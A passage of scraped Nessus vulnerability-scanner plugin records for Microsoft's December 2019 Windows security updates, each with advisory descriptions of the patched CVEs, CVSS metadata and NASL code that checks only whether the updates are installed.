\"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"MSKB\", value:\"4530681\");\n script_xref(name:\"MSFT\", value:\"MS19-4530681\");\n\n script_name(english:\"KB4530681: Windows 10 December 2019 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530681.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1472, CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530681/windows-10-update-kb4530681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3629add0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4530681.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows Uninitialized Variable Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530681');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530681])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:33:11", "description": "The remote Windows host is missing security update 4530698 or cumulative update 4530691. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "KB4530698: Windows Server 2012 December 2019 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2023-01-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530691.NASL", "href": "https://www.tenable.com/plugins/nessus/131928", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131928);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/19\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"MSKB\", value:\"4530691\");\n script_xref(name:\"MSKB\", value:\"4530698\");\n script_xref(name:\"MSFT\", value:\"MS19-4530691\");\n script_xref(name:\"MSFT\", value:\"MS19-4530698\");\n\n script_name(english:\"KB4530698: Windows Server 2012 December 2019 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530698\nor cumulative update 4530691. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530698/windows-server-2012-update-kb4530698\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41f8c8b1\");\n # https://support.microsoft.com/en-us/help/4530691/windows-server-2012-update-kb4530691\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c69ab12f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530698 or Cumulative Update KB4530691.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows Uninitialized Variable Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530698', '4530691');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530698, 4530691])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:33:25", "description": "The remote Windows host is missing security update 4530730 or cumulative update 4530702. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "KB4530730: Windows 8.1 and Windows Server 2012 R2 December 2019 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2023-01-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530702.NASL", "href": "https://www.tenable.com/plugins/nessus/131930", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131930);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/19\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"MSKB\", value:\"4530702\");\n script_xref(name:\"MSKB\", value:\"4530730\");\n script_xref(name:\"MSFT\", value:\"MS19-4530702\");\n script_xref(name:\"MSFT\", value:\"MS19-4530730\");\n\n script_name(english:\"KB4530730: Windows 8.1 and Windows Server 2012 R2 December 2019 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530730\nor cumulative update 4530702. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4530702/windows-8-1-kb4530702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4530730/windows-8-1-kb4530730\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530730 or Cumulative Update KB4530702.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows Uninitialized Variable Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530702', '4530730');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530702, 4530730])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:33:11", "description": "The remote Windows host is missing security update 4530714.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2019-1472, CVE-2019-1474)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles junctions. (CVE-2019-1483)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2019-1476)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)\n\n - A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n (CVE-2019-1488)", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "KB4530714: Windows 10 Version 1709 December 2019 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1453", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1476", "CVE-2019-1483", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2020-05-27T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530714.NASL", "href": "https://www.tenable.com/plugins/nessus/131931", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is 